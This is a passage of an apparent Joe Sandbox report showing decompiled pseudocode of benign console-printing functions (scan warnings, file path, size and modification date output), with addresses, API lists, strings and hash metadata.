				intOrPtr _t50;
				void* _t51;
				void* _t54;
				void* _t55;
				signed char* _t83;
				intOrPtr _t86;
				struct _IO_FILE** _t87;
				signed char _t91;
				intOrPtr _t133;
				signed int _t140;
				struct _IO_FILE** _t142;
				void* _t144;

				_t133 = __edx;
				E0041F1B0(E00426718, _t144);
				 *((intOrPtr*)(_t144 - 0x18)) = __ecx;
				_t91 = 0;
				_t142 =  *(_t144 + 0x10);
				 *((intOrPtr*)(_t144 - 0x10)) = __edx;
				 *((intOrPtr*)(_t144 - 0x14)) = 0;
				if( *((intOrPtr*)(__edx + 0xf8)) == 0) {
					L4:
					_t83 =  *(_t144 + 8);
					if( *((intOrPtr*)(_t144 - 0x18)) != _t91 ||  *_t83 != _t91 || _t83[8] != _t91 || _t83[0x14] != _t91) {
						__eflags = _t142 - _t91;
						if(_t142 == _t91) {
							L31:
							_t50 = 2;
							goto L32;
						}
						_t51 = E003B2D47(_t144 - 0x24);
						_t140 = 0;
						__eflags = _t83[8];
						 *(_t144 - 4) = 0;
						if(_t83[8] != 0) {
							E003B3164(_t144 - 0x24, _t83[4]);
							_t51 = E003B30B5(_t144 - 0x24);
						}
						__eflags = _t83[0x14];
						if(__eflags <= 0) {
							L26:
							_t85 =  *_t83;
							__eflags =  *_t83;
							if(__eflags != 0) {
								_t54 = E003B557F(_t144 - 0x30, _t85, __eflags);
								 *(_t144 - 4) = 1;
								_t55 = E003B3128(_t144 - 0x24, __eflags, _t54);
								_t39 = _t144 - 4;
								 *_t39 =  *(_t144 - 4) & 0x00000000;
								__eflags =  *_t39;
								E003B1E40(_t55,  *((intOrPtr*)(_t144 - 0x30)));
								_t51 = E003B30B5(_t144 - 0x24);
							}
							__eflags =  *(_t144 - 0x20);
							if(__eflags != 0) {
								_push( *((intOrPtr*)(_t144 - 0x24)));
								_push(L"\nError:\n");
								_t51 = L003B1FB3(L003B1FB3(_t142, __eflags), __eflags);
							}
							E003B1E40(_t51,  *((intOrPtr*)(_t144 - 0x24)));
							goto L31;
						} else {
							do {
								E003B3128(_t144 - 0x24, __eflags,  *((intOrPtr*)(_t83[0x10] + _t140 * 4)));
								_t51 = E003B30B5(_t144 - 0x24);
								_t140 = _t140 + 1;
								__eflags = _t140 - _t83[0x14];
							} while (__eflags < 0);
							goto L26;
						}
					} else {
						_t86 =  *((intOrPtr*)(_t133 + 0xe0));
						if(_t86 != _t91) {
							__eflags = _t142 - _t91;
							if(_t142 != _t91) {
								E003B1FA0(_t142);
								fputs("WARNINGS for files:",  *_t142);
								E003B1FA0(_t142);
								E003B1FA0(_t142);
								E003EA6F9( *((intOrPtr*)(_t144 - 0x10)) + 0xdc, _t142);
								fputs("WARNING: Cannot open ",  *_t142);
								fputs(" file",  *(E003B21D8(_t142, _t86)));
								__eflags = _t86 - 1;
								if(_t86 > 1) {
									fputc(0x73,  *_t142);
								}
								E003B1FA0(_t142);
							}
							 *((intOrPtr*)(_t144 - 0x14)) = 1;
						} else {
							if( *((char*)(_t144 + 0x14)) != 0 &&  *((intOrPtr*)(_t133 + 0xf8)) == _t91) {
								_t87 =  *(_t144 + 0xc);
								if(_t87 != _t91) {
									if(_t142 != _t91) {
										L003B1F91(_t142);
									}
									fputs( *0x42d3d8,  *_t87);
									E003B1FA0(_t87);
								}
							}
						}
						_t50 =  *((intOrPtr*)(_t144 - 0x14));
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t144 - 0xc));
						return _t50;
					}
				}
				if(_t142 != 0) {
					E003B1FA0(_t142);
					fputs("Scan WARNINGS for files and folders:",  *_t142);
					E003B1FA0(_t142);
					E003B1FA0(_t142);
					E003EA6F9( *((intOrPtr*)(_t144 - 0x10)) + 0xf4, _t142);
					fputs("Scan WARNINGS: ",  *_t142);
					E003B21D8(_t142,  *((intOrPtr*)( *((intOrPtr*)(_t144 - 0x10)) + 0xf8)));
					E003B1FA0(_t142);
					_t133 =  *((intOrPtr*)(_t144 - 0x10));
					_t91 = 0;
				}
				 *((intOrPtr*)(_t144 - 0x14)) = 1;
				goto L4;
			}















                                                                                                    0x003ea4c7
                                                                                                    0x003ea4cc
                                                                                                    0x003ea4da
                                                                                                    0x003ea4de
                                                                                                    0x003ea4e1
                                                                                                    0x003ea4ed
                                                                                                    0x003ea4f0
                                                                                                    0x003ea4f3
                                                                                                    0x003ea555
                                                                                                    0x003ea558
                                                                                                    0x003ea55b
                                                                                                    0x003ea63f
                                                                                                    0x003ea641
                                                                                                    0x003ea6e5
                                                                                                    0x003ea6e7
                                                                                                    0x00000000
                                                                                                    0x003ea6e7
                                                                                                    0x003ea64a
                                                                                                    0x003ea64f
                                                                                                    0x003ea651
                                                                                                    0x003ea654
                                                                                                    0x003ea657
                                                                                                    0x003ea65f
                                                                                                    0x003ea667
                                                                                                    0x003ea667
                                                                                                    0x003ea66c
                                                                                                    0x003ea670
                                                                                                    0x003ea68e
                                                                                                    0x003ea68e
                                                                                                    0x003ea690
                                                                                                    0x003ea692
                                                                                                    0x003ea699
                                                                                                    0x003ea6a2
                                                                                                    0x003ea6a6
                                                                                                    0x003ea6ab
                                                                                                    0x003ea6ab
                                                                                                    0x003ea6ab
                                                                                                    0x003ea6b2
                                                                                                    0x003ea6bb
                                                                                                    0x003ea6bb
                                                                                                    0x003ea6c0
                                                                                                    0x003ea6c4
                                                                                                    0x003ea6c6
                                                                                                    0x003ea6cb
                                                                                                    0x003ea6d7
                                                                                                    0x003ea6d7
                                                                                                    0x003ea6df
                                                                                                    0x00000000
                                                                                                    0x003ea672
                                                                                                    0x003ea672
                                                                                                    0x003ea67b
                                                                                                    0x003ea683
                                                                                                    0x003ea688
                                                                                                    0x003ea689
                                                                                                    0x003ea689
                                                                                                    0x00000000
                                                                                                    0x003ea672
                                                                                                    0x003ea57b
                                                                                                    0x003ea57b
                                                                                                    0x003ea583
                                                                                                    0x003ea5c6
                                                                                                    0x003ea5c8
                                                                                                    0x003ea5cc
                                                                                                    0x003ea5d8
                                                                                                    0x003ea5de
                                                                                                    0x003ea5e5
                                                                                                    0x003ea5f5
                                                                                                    0x003ea601
                                                                                                    0x003ea614
                                                                                                    0x003ea617
                                                                                                    0x003ea61b
                                                                                                    0x003ea621
                                                                                                    0x003ea628
                                                                                                    0x003ea62b
                                                                                                    0x003ea62b
                                                                                                    0x003ea630
                                                                                                    0x003ea585
                                                                                                    0x003ea589
                                                                                                    0x003ea59b
                                                                                                    0x003ea5a0
                                                                                                    0x003ea5a8
                                                                                                    0x003ea5ac
                                                                                                    0x003ea5ac
                                                                                                    0x003ea5b9
                                                                                                    0x003ea5bf
                                                                                                    0x003ea5bf
                                                                                                    0x003ea5a0
                                                                                                    0x003ea589
                                                                                                    0x003ea637
                                                                                                    0x003ea6e8
                                                                                                    0x003ea6ee
                                                                                                    0x003ea6f6
                                                                                                    0x003ea6f6
                                                                                                    0x003ea55b
                                                                                                    0x003ea4f7
                                                                                                    0x003ea4fb
                                                                                                    0x003ea507
                                                                                                    0x003ea50d
                                                                                                    0x003ea514
                                                                                                    0x003ea524
                                                                                                    0x003ea536
                                                                                                    0x003ea53d
                                                                                                    0x003ea544
                                                                                                    0x003ea549
                                                                                                    0x003ea54c
                                                                                                    0x003ea54c
                                                                                                    0x003ea54e
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EA4CC
                                                                                                    • fputs.MSVCRT ref: 003EA536
                                                                                                      • Part of subcall function 003B21D8: fputs.MSVCRT ref: 003B21F2
                                                                                                    • fputs.MSVCRT ref: 003EA507
                                                                                                      • Part of subcall function 003EA6F9: __EH_prolog.LIBCMT ref: 003EA6FE
                                                                                                      • Part of subcall function 003EA6F9: fputs.MSVCRT ref: 003EA727
                                                                                                      • Part of subcall function 003EA6F9: fputs.MSVCRT ref: 003EA76B
                                                                                                    • fputs.MSVCRT ref: 003EA5B9
                                                                                                    • fputs.MSVCRT ref: 003EA5D8
                                                                                                    • fputs.MSVCRT ref: 003EA601
                                                                                                    • fputs.MSVCRT ref: 003EA614
                                                                                                    • fputc.MSVCRT ref: 003EA621
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prologfputc
                                                                                                    • String ID: Error:$ file$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                                                    • API String ID: 3294964263-2840245699
                                                                                                    • Opcode ID: cbbcda8940ddf98c83916c9616cd03bac739c9fa03f2023d5b189ac3dce513f8
                                                                                                    • Instruction ID: f6d1e61bf7ad00801f61bb1fabce6d954e7d62340d8002db35590703d41974b4
                                                                                                    • Opcode Fuzzy Hash: cbbcda8940ddf98c83916c9616cd03bac739c9fa03f2023d5b189ac3dce513f8
                                                                                                    • Instruction Fuzzy Hash: A1513631A001618BCF1BFF55D8926EEB3B1AF84304F65026EE5026E5C1CF316E45CB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E4831 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E003E4831(struct _IO_FILE** __ecx, void* __edx) {
				signed int _t19;
				void* _t32;
				signed int* _t33;
				struct _IO_FILE** _t48;
				void* _t53;
				void* _t55;
				void* _t57;

				E0041F1B0(0x425fd8, _t53);
				_t48 = __ecx;
				_t32 = __edx;
				fputs( *0x42c260,  *__ecx);
				fputs("Path:     ",  *_t48);
				_t57 = _t55 - 0x4c + 0x10;
				_push(_t32);
				E003B211A(_t48);
				_t19 = E003B1FA0(_t48);
				_t33 =  *(_t53 + 0xc);
				if(_t33 != 0) {
					_t19 =  *_t33 & _t33[1];
					if(_t19 != 0xffffffff) {
						E003B2690(_t53 - 0x18);
						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
						E003E438A(_t53 - 0x18,  *_t33, _t33[1]);
						fputs( *0x42c260,  *_t48);
						fputs("Size:     ",  *_t48);
						fputs( *(_t53 - 0x18),  *_t48);
						_t57 = _t57 + 0x18;
						_t19 = E003B1E40(E003B1FA0(_t48),  *(_t53 - 0x18));
					}
				}
				if( *((intOrPtr*)(_t53 + 8)) != 0) {
					_t19 = E003B9627(_t53 - 0x58, 0);
					if(_t19 != 0) {
						fputs( *0x42c260,  *_t48);
						fputs("Modified: ",  *_t48);
						fputs(_t53 - 0x58,  *_t48);
						_t19 = E003B1FA0(_t48);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t19;
			}










                                                                                                    0x003e4836
                                                                                                    0x003e4847
                                                                                                    0x003e4849
                                                                                                    0x003e4853
                                                                                                    0x003e485c
                                                                                                    0x003e485e
                                                                                                    0x003e4863
                                                                                                    0x003e4864
                                                                                                    0x003e486b
                                                                                                    0x003e4870
                                                                                                    0x003e4875
                                                                                                    0x003e4879
                                                                                                    0x003e487f
                                                                                                    0x003e4884
                                                                                                    0x003e488c
                                                                                                    0x003e4895
                                                                                                    0x003e48a2
                                                                                                    0x003e48ab
                                                                                                    0x003e48b2
                                                                                                    0x003e48b4
                                                                                                    0x003e48c1
                                                                                                    0x003e48c6
                                                                                                    0x003e487f
                                                                                                    0x003e48cc
                                                                                                    0x003e48d3
                                                                                                    0x003e48da
                                                                                                    0x003e48e4
                                                                                                    0x003e48ed
                                                                                                    0x003e48f5
                                                                                                    0x003e48fc
                                                                                                    0x003e48fc
                                                                                                    0x003e48da
                                                                                                    0x003e4907
                                                                                                    0x003e490f

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog$fputcfree
                                                                                                    • String ID: Modified: $Path: $Size:
                                                                                                    • API String ID: 2632947726-3207571042
                                                                                                    • Opcode ID: c6460269529d116e15d01ed62b6856c596de9cc82c169d073a20feb09120969c
                                                                                                    • Instruction ID: 33c7d25f47a527f2433981b9fac3f35442db441abe47e1cef8c437ade0140c8b
                                                                                                    • Opcode Fuzzy Hash: c6460269529d116e15d01ed62b6856c596de9cc82c169d073a20feb09120969c
                                                                                                    • Instruction Fuzzy Hash: 9521F531A00119EBCF06AF95DCC2EEEBF32EF48354F544126F5049A1A1EB365861DF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E6550 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 341COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 86%
                                                                                                    			E003E6550(intOrPtr* __ecx) {
				void* __ebx;
				signed int _t149;
				signed int _t154;
				intOrPtr* _t155;
				intOrPtr _t156;
				int _t161;
				int _t176;
				signed int _t182;
				intOrPtr _t183;
				void* _t186;
				intOrPtr* _t190;
				intOrPtr* _t194;
				signed int _t202;
				char* _t221;
				void* _t222;
				char* _t223;
				signed int _t228;
				signed short _t234;
				struct _IO_FILE** _t239;
				intOrPtr _t275;
				intOrPtr* _t289;
				intOrPtr _t290;
				intOrPtr _t291;
				char* _t292;
				intOrPtr _t293;
				char** _t294;
				intOrPtr* _t297;
				void* _t299;

				E0041F1B0(E00426148, _t299);
				 *(_t299 - 0x10) =  *(_t299 - 0x10) & 0x00000000;
				 *(_t299 - 0x1c) =  *(_t299 - 0x1c) & 0x00000000;
				_t297 = __ecx;
				_t219 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t299 - 0x14) = _t219;
				if( *((intOrPtr*)(__ecx + 4)) <= 0) {
					L68:
					E003B1FA0(0x43a5b0);
					_t149 = 0;
					L69:
					 *[fs:0x0] =  *((intOrPtr*)(_t299 - 0xc));
					return _t149;
				} else {
					goto L1;
				}
				do {
					L1:
					_t289 =  *((intOrPtr*)( *_t297 +  *(_t299 - 0x1c) * 4));
					if(_t219 != 0) {
						__eflags =  *(_t289 + 0x18);
						if(__eflags == 0) {
							_push( *((intOrPtr*)(_t289 + 8)));
							L003B1FB3(0x43a5b0, __eflags);
						} else {
							fputs( *(_t289 + 0x14),  *0x43a5b0);
						}
					} else {
						E003E6A16(_t299 +  *(_t299 - 0x10) - 0xd4,  *((intOrPtr*)(_t289 + 0x28)));
						 *(_t299 - 0x10) =  *(_t299 - 0x10) +  *((intOrPtr*)(_t289 + 0x28));
					}
					_t275 =  *_t289;
					if(_t275 != 3) {
						__eflags =  *((char*)(_t289 + 4));
						 *((intOrPtr*)(_t299 - 0x30)) =  *((intOrPtr*)(_t289 + 0x2c));
						if( *((char*)(_t289 + 4)) == 0) {
							_t234 = 0;
							 *((short*)(_t299 - 0x2c)) = 0;
							 *((short*)(_t299 - 0x2a)) = 0;
							 *(_t299 - 0x24) = 0;
							 *(_t299 - 4) = 1;
							_t154 = _t275 - 7;
							__eflags = _t154;
							if(_t154 == 0) {
								_t155 =  *((intOrPtr*)(_t299 + 0xc));
								__eflags =  *((char*)(_t155 + 8));
								if( *((char*)(_t155 + 8)) == 0) {
									L39:
									_t156 =  *_t289;
									__eflags = _t156 - 9;
									if(_t156 != 9) {
										L45:
										__eflags = _t234;
										if(_t234 != 0) {
											__eflags = _t234 - 0x40;
											if(_t234 != 0x40) {
												__eflags = _t234 - 8;
												if(_t234 != 8) {
													E003DD5C3(_t219, _t299 - 0x114, _t299 - 0x2c, _t156, 0);
													__eflags =  *(_t299 - 0x14);
													if( *(_t299 - 0x14) == 0) {
														_t221 = _t299 +  *(_t299 - 0x10) - 0xd4;
														E003E6A91(_t221,  *((intOrPtr*)(_t289 + 0x24)),  *((intOrPtr*)(_t299 - 0x30)), _t299 - 0x114);
														_t161 = strlen(_t221);
														L62:
														_t133 = _t299 - 0x10;
														 *_t133 =  *(_t299 - 0x10) + _t161;
														__eflags =  *_t133;
														L63:
														_t135 = _t299 - 4;
														 *_t135 =  *(_t299 - 4) | 0xffffffff;
														__eflags =  *_t135;
														E003B92C9(_t299 - 0x2c);
														L64:
														_t219 =  *(_t299 - 0x14);
														__eflags = _t219;
														if(_t219 == 0) {
															goto L67;
														}
														_t239 = 0x43a5b0;
														goto L66;
													}
													fputs(_t299 - 0x114,  *0x43a5b0);
													L52:
													goto L63;
												}
												_t222 = _t297 + 0x2c;
												E003B2FDA(_t156, _t222,  *(_t299 - 0x24));
												E003B209A(0x43a5b0, _t222);
												__eflags =  *(_t299 - 0x14);
												_push(_t297 + 0x20);
												_push(_t222);
												if( *(_t299 - 0x14) == 0) {
													E003E6A42( *((intOrPtr*)(_t289 + 0x24)),  *((intOrPtr*)(_t299 - 0x30)));
												} else {
													E003B2010(0x43a5b0);
												}
												goto L63;
											}
											 *(_t299 - 0x3a) =  *(_t299 - 0x3a) & 0x00000000;
											 *(_t299 - 0x39) =  *(_t299 - 0x39) & 0x00000000;
											 *((intOrPtr*)(_t299 - 0x44)) = 0;
											 *((intOrPtr*)(_t299 - 0x40)) = 0;
											 *((short*)(_t299 - 0x3c)) = 0;
											L003C3939(_t299 - 0x44, _t299 - 0x2c);
											_t223 = _t299 +  *(_t299 - 0x10) - 0xd4;
											E003E6AFE(_t223, _t299 - 0x44,  *(_t299 - 0x14));
											__eflags =  *(_t299 - 0x14);
											if( *(_t299 - 0x14) == 0) {
												_t176 = strlen(_t223);
												_t290 =  *((intOrPtr*)(_t289 + 0x2c));
												 *(_t299 - 0x10) =  *(_t299 - 0x10) + _t176;
												__eflags = _t176 - _t290;
												if(_t176 >= _t290) {
													goto L63;
												}
												_t291 = _t290 - _t176;
												L48:
												E003E6A16(_t299 +  *(_t299 - 0x10) - 0xd4, _t291);
												 *(_t299 - 0x10) =  *(_t299 - 0x10) + _t291;
												goto L63;
											}
											fputs(_t223,  *0x43a5b0);
											goto L52;
										}
										__eflags =  *(_t299 - 0x14);
										if( *(_t299 - 0x14) != 0) {
											goto L63;
										}
										_t291 =  *((intOrPtr*)(_t299 - 0x30));
										goto L48;
									}
									__eflags = _t234;
									if(_t234 == 0) {
										L42:
										_t292 = _t299 +  *(_t299 - 0x10) - 0xd4;
										asm("sbb ecx, ecx");
										E003E699A( ~_t234 &  *(_t299 - 0x24),  *((intOrPtr*)(_t297 + 0x38)),  *(_t299 - 0x14), _t292);
										__eflags =  *(_t299 - 0x14);
										if( *(_t299 - 0x14) == 0) {
											_t161 = strlen(_t292);
											goto L62;
										}
										fputs(_t292,  *0x43a5b0);
										goto L52;
									}
									__eflags = _t234 - 0x13;
									if(_t234 != 0x13) {
										goto L45;
									}
									goto L42;
								}
								_push( *((intOrPtr*)(_t155 + 4)));
								_push( *_t155);
								L37:
								E003B9270(_t299 - 0x2c);
								L38:
								_t234 =  *((intOrPtr*)(_t299 - 0x2c));
								goto L39;
							}
							_t182 = _t154 - 1;
							__eflags = _t182;
							if(_t182 == 0) {
								_t183 =  *((intOrPtr*)(_t299 + 0xc));
								__eflags =  *((char*)(_t183 + 0x18));
								if( *((char*)(_t183 + 0x18)) == 0) {
									goto L39;
								}
								_push( *((intOrPtr*)(_t183 + 0x14)));
								_push( *((intOrPtr*)(_t183 + 0x10)));
								goto L37;
							}
							__eflags = _t182 == 4;
							if(_t182 == 4) {
								_t186 =  *((intOrPtr*)(_t299 + 0xc)) + 0x20;
								__eflags =  *((char*)(_t186 + 0xb));
								if( *((char*)(_t186 + 0xb)) == 0) {
									goto L39;
								}
								_t219 =  *(_t186 + 0xa) & 0x000000ff;
								 *(_t299 - 0x48) =  *(_t186 + 8) & 0x0000ffff;
								E003B929C(_t299 - 0x2c, _t186);
								 *(_t299 - 0x26) =  *(_t299 - 0x26) & 0x00000000;
								 *((short*)(_t299 - 0x2a)) =  *(_t299 - 0x48);
								 *((short*)(_t299 - 0x28)) =  *(_t186 + 0xa) & 0x000000ff;
								goto L38;
							}
							_t190 =  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0xc))));
							_t219 =  *((intOrPtr*)( *_t190 + 0x18))(_t190,  *((intOrPtr*)(_t299 + 8)), _t275, _t299 - 0x2c);
							__eflags = _t219;
							if(_t219 != 0) {
								E003B92C9(_t299 - 0x2c);
								_t149 = _t219;
								goto L69;
							}
							goto L38;
						}
						_t194 =  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0xc)) + 8));
						_t149 =  *((intOrPtr*)( *_t194 + 0x10))(_t194,  *((intOrPtr*)(_t299 + 8)), _t275, _t299 - 0x34, _t299 - 0x18, _t299 - 0x38);
						__eflags = _t149;
						if(_t149 != 0) {
							goto L69;
						}
						_t284 =  *(_t299 - 0x18);
						__eflags =  *(_t299 - 0x18);
						if( *(_t299 - 0x18) == 0) {
							goto L64;
						}
						_t293 =  *_t289;
						_t228 = 1;
						__eflags = _t293 - 0x3e;
						if(_t293 != 0x3e) {
							__eflags = _t293 - 0x59;
							if(_t293 != 0x59) {
								L22:
								__eflags =  *((intOrPtr*)(_t299 - 0x38)) - 1;
								if( *((intOrPtr*)(_t299 - 0x38)) != 1) {
									L70:
									_t149 = 0x80004005;
									goto L69;
								}
								__eflags =  *(_t299 - 0x18) - 0x40;
								if( *(_t299 - 0x18) <= 0x40) {
									E003E6B76(_t299 - 0x198,  *((intOrPtr*)(_t299 - 0x34)),  *(_t299 - 0x18));
									fputs(_t299 - 0x198,  *0x43a5b0);
									L17:
									goto L64;
								}
								fputs("data:",  *0x43a5b0);
								E003B21D8(0x43a5b0,  *(_t299 - 0x18));
								goto L64;
							}
							E003B2D47(_t299 - 0x54);
							 *(_t299 - 4) =  *(_t299 - 4) & 0x00000000;
							_push(_t299 - 0x54);
							_t202 = L003DDB42( *((intOrPtr*)(_t299 - 0x34)),  *(_t299 - 0x18), __eflags);
							__eflags = _t202;
							if(_t202 != 0) {
								_t228 = 0;
								__eflags = 0;
								_t202 = E003B2010(0x43a5b0, _t299 - 0x54, _t297 + 0x20);
							}
							 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
							E003B1E40(_t202,  *((intOrPtr*)(_t299 - 0x54)));
							__eflags = _t228;
							if(_t228 == 0) {
								goto L64;
							} else {
								goto L22;
							}
						}
						__eflags =  *((intOrPtr*)(_t299 - 0x38)) - 1;
						if( *((intOrPtr*)(_t299 - 0x38)) != 1) {
							goto L70;
						}
						_t294 = _t297 + 0x20;
						L003DD764( *((intOrPtr*)(_t299 - 0x34)), _t284, _t299, _t294);
						fputs( *_t294,  *0x43a5b0);
						goto L17;
					} else {
						if(_t219 == 0) {
							fputs(_t299 - 0xd4,  *0x43a5b0);
						}
						E003B20DF(0x43a5b0, _t297 + 0x14, _t297 + 0x2c, _t297 + 0x20);
						if(_t219 != 0) {
							_t239 = 0x43a5b0;
							L66:
							E003B1FA0(_t239);
						}
					}
					L67:
					 *(_t299 - 0x1c) =  *(_t299 - 0x1c) + 1;
				} while ( *(_t299 - 0x1c) <  *((intOrPtr*)(_t297 + 4)));
				goto L68;
			}































                                                                                                    0x003e6555
                                                                                                    0x003e6560
                                                                                                    0x003e6564
                                                                                                    0x003e656a
                                                                                                    0x003e6570
                                                                                                    0x003e6575
                                                                                                    0x003e6578
                                                                                                    0x003e696a
                                                                                                    0x003e696f
                                                                                                    0x003e6974
                                                                                                    0x003e6976
                                                                                                    0x003e697c
                                                                                                    0x003e6984
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e657e
                                                                                                    0x003e657e
                                                                                                    0x003e6585
                                                                                                    0x003e6588
                                                                                                    0x003e65a4
                                                                                                    0x003e65a8
                                                                                                    0x003e65be
                                                                                                    0x003e65c6
                                                                                                    0x003e65aa
                                                                                                    0x003e65b4
                                                                                                    0x003e65bb
                                                                                                    0x003e658a
                                                                                                    0x003e6597
                                                                                                    0x003e659f
                                                                                                    0x003e659f
                                                                                                    0x003e65cb
                                                                                                    0x003e65d0
                                                                                                    0x003e6615
                                                                                                    0x003e6619
                                                                                                    0x003e661c
                                                                                                    0x003e672a
                                                                                                    0x003e672c
                                                                                                    0x003e6730
                                                                                                    0x003e6734
                                                                                                    0x003e6739
                                                                                                    0x003e6740
                                                                                                    0x003e6740
                                                                                                    0x003e6743
                                                                                                    0x003e67b0
                                                                                                    0x003e67b3
                                                                                                    0x003e67b7
                                                                                                    0x003e67ca
                                                                                                    0x003e67ca
                                                                                                    0x003e67cc
                                                                                                    0x003e67cf
                                                                                                    0x003e680f
                                                                                                    0x003e6811
                                                                                                    0x003e6814
                                                                                                    0x003e683b
                                                                                                    0x003e683f
                                                                                                    0x003e68ac
                                                                                                    0x003e68b0
                                                                                                    0x003e68f9
                                                                                                    0x003e68fe
                                                                                                    0x003e6902
                                                                                                    0x003e691c
                                                                                                    0x003e692f
                                                                                                    0x003e6935
                                                                                                    0x003e6935
                                                                                                    0x003e693a
                                                                                                    0x003e693a
                                                                                                    0x003e693a
                                                                                                    0x003e693e
                                                                                                    0x003e693e
                                                                                                    0x003e693e
                                                                                                    0x003e693e
                                                                                                    0x003e6945
                                                                                                    0x003e694a
                                                                                                    0x003e694a
                                                                                                    0x003e694d
                                                                                                    0x003e694f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e6951
                                                                                                    0x00000000
                                                                                                    0x003e6951
                                                                                                    0x003e6883
                                                                                                    0x003e6883
                                                                                                    0x00000000
                                                                                                    0x003e688a
                                                                                                    0x003e68b5
                                                                                                    0x003e68ba
                                                                                                    0x003e68c5
                                                                                                    0x003e68ca
                                                                                                    0x003e68d1
                                                                                                    0x003e68d2
                                                                                                    0x003e68d3
                                                                                                    0x003e68e7
                                                                                                    0x003e68d5
                                                                                                    0x003e68da
                                                                                                    0x003e68da
                                                                                                    0x00000000
                                                                                                    0x003e68d3
                                                                                                    0x003e6841
                                                                                                    0x003e6845
                                                                                                    0x003e6850
                                                                                                    0x003e6853
                                                                                                    0x003e6856
                                                                                                    0x003e685a
                                                                                                    0x003e6868
                                                                                                    0x003e6871
                                                                                                    0x003e6876
                                                                                                    0x003e687a
                                                                                                    0x003e6891
                                                                                                    0x003e6896
                                                                                                    0x003e6899
                                                                                                    0x003e689c
                                                                                                    0x003e689f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e68a5
                                                                                                    0x003e6822
                                                                                                    0x003e682e
                                                                                                    0x003e6833
                                                                                                    0x00000000
                                                                                                    0x003e6833
                                                                                                    0x003e6883
                                                                                                    0x00000000
                                                                                                    0x003e6883
                                                                                                    0x003e6816
                                                                                                    0x003e6819
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e681f
                                                                                                    0x00000000
                                                                                                    0x003e681f
                                                                                                    0x003e67d1
                                                                                                    0x003e67d4
                                                                                                    0x003e67dc
                                                                                                    0x003e67e5
                                                                                                    0x003e67f0
                                                                                                    0x003e67f5
                                                                                                    0x003e67fa
                                                                                                    0x003e67fe
                                                                                                    0x003e6935
                                                                                                    0x00000000
                                                                                                    0x003e6935
                                                                                                    0x003e6883
                                                                                                    0x00000000
                                                                                                    0x003e6883
                                                                                                    0x003e67d6
                                                                                                    0x003e67da
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e67da
                                                                                                    0x003e67b9
                                                                                                    0x003e67bc
                                                                                                    0x003e67be
                                                                                                    0x003e67c1
                                                                                                    0x003e67c6
                                                                                                    0x003e67c6
                                                                                                    0x00000000
                                                                                                    0x003e67c6
                                                                                                    0x003e6745
                                                                                                    0x003e6745
                                                                                                    0x003e6746
                                                                                                    0x003e679f
                                                                                                    0x003e67a2
                                                                                                    0x003e67a6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e67a8
                                                                                                    0x003e67ab
                                                                                                    0x00000000
                                                                                                    0x003e67ab
                                                                                                    0x003e6748
                                                                                                    0x003e674b
                                                                                                    0x003e676f
                                                                                                    0x003e6772
                                                                                                    0x003e6776
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e677c
                                                                                                    0x003e6780
                                                                                                    0x003e6787
                                                                                                    0x003e6790
                                                                                                    0x003e6795
                                                                                                    0x003e6799
                                                                                                    0x00000000
                                                                                                    0x003e6799
                                                                                                    0x003e6755
                                                                                                    0x003e6760
                                                                                                    0x003e6762
                                                                                                    0x003e6764
                                                                                                    0x003e6991
                                                                                                    0x003e6996
                                                                                                    0x00000000
